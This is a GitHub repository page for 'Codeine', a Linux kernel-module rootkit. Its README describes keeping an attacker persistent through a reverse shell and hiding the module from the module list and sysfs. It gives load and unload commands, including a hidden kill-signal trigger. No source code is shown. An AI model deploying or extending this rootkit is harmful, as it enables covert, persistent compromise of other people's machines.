Skip to content

diego-tella/Codeine

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
Makefile
Makefile
 
 
README.md
README.md
 
 
codeine.c
codeine.c
 
 
ftrace_helper.h
ftrace_helper.h
 
 

Repository files navigation

 .o88b.  .d88b.  d8888b. d88888b d888888b d8b   db d88888b 
d8P  Y8 .8P  Y8. 88  `8D 88'       `88'   888o  88 88'     
8P      88    88 88   88 88ooooo    88    88V8o 88 88ooooo 
8b      88    88 88   88 88~~~~~    88    88 V8o88 88~~~~~ 
Y8b  d8 `8b  d8' 88  .8D 88.       .88.   88  V888 88.     
 `Y88P'  `Y88P'  Y8888D' Y88888P Y888888P VP   V8P Y88888P

Codeine is a Linux LKM Rootkit aimed at ensuring the attacker’s persistence through a reverse shell and remaining completely hidden in the system. It hides itself from the modules list and sysfs.

Tested on kernel version:

  • 6.x
  • 5.15

    • Install

    make
insmod codeine.ko

    Uninstall

    kill -59 0 //if CANBEHIDE var is TRUE
rmmod codeine

    To do

  • Hide TCP connections
  • Hide PIDs
    •

    About

    Linux LKM Rootkit

    Resources

    Readme
    Activity

    Stars

    9 stars

    Watchers

    1 watching

    Forks

    0 forks
    Report repository

    Releases

    No releases published

    Packages

    No packages published

    Languages